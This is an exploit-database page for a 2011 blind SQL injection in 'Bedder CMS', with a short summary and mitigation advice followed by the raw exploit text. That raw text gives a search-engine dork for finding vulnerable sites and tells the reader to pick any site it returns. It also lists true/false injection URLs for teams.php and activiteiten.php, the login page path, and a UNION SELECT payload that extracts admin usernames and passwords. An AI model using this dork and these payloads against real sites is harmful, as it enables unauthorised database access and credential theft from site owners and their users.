header-logo
Suggest Exploit
vendor:
CMS
by:
^Xecuti0n3r
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Bedder CMS Blind SQL Injection Vulnerability

Bedder CMS is vulnerable to Blind SQL Injection. An attacker can inject malicious SQL queries into the vulnerable parameter of the application. This can be exploited to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerable parameter can be identified by sending a request with a true and false condition. If the application responds differently to the two requests, then the parameter is vulnerable to SQL injection.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection.
Source

Exploit-DB raw data:

#(+)Exploit Title: Bedder CMS Blind SQL Injection Vulnerability
#(+)Author   : ^Xecuti0n3r
#(+) Date    : 15.04.2011
#(+) Hour    : 13:37 PM
#(+) E-mail  :  xecuti0n3r()yahoo.com
#(+) dork    : intext:"Design by Bedder"
#(+) Category  : Web Apps [Blind SQli]

____________________________________________________________________
____________________________________________________________________

Choose any site that comes up when you enter the dork intext:"Design by Bedder" in search engine


    *Blind SQL injection Vulnerability*
	


#	[+]True : http://site.com/teams.php?id=1 and 1=1--
#	[+]False: http://site.com/teams.php?id=1 and 1=2--
#	[+]eViL : http://site.com/teams.php?id=[SQLi]



#	[+]True : http://site.com/activiteiten.php?id=91 and 1=1--
#	[+]False: http://site.com/activiteiten.php?id=91 and 1=2--
#	[+]eViL : http://site.com/activiteiten.php?id=[SQLi]


#	[+]Cms Login Page is at : http://site.com/cms/index.php

#      [+]evIL: teams.php?id=-1+union+select+1,2,concat(autorisatie_gebruikersnaam,0x3a,autorisatie_wachtwoord)+from+autorisatie



____________________________________________________________________
____________________________________________________________________

########################################################################
(+)Exploit Coded by: ^Xecuti0n3r 
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
########################################################################